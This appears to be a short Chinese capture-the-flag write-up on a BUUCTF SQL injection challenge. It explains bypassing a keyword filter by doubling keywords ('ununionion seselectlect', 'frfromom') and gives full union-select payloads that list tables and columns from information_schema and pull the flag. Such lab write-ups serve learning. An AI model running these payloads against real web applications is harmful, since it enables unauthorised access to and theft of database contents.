常规注入不可行,很明显过滤了什么字符,我试了下双写。
跟之前lovesql差不多
这边报错,试试双写and
这边发现显示and了
查询表的时候发现报错了
看到报错的内容,缺哪个就双写哪个 oorrder bbyy
然后就是常规操作了,发现也3个字段
接着联合查询双写
好了跟lovesql差不多了,flag应该也是在3个字段
常规操作
我自己瞎试了试from的双写frfromom
发现
好了跟order 双写一样
爆出库名,很明显flag在ctf库里,然后就特别简单了
playload:http://a86210a7-e9a6-4761-bf62-ff61cafda938.node3.buuoj.cn/check.php?username=1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables %23&password=3543
这个很明显了,估计字段名也是flag,还是老实查吧
payloadusername=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns %23&password=3543
果然是flag
payload:
username=1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag %23&password=3543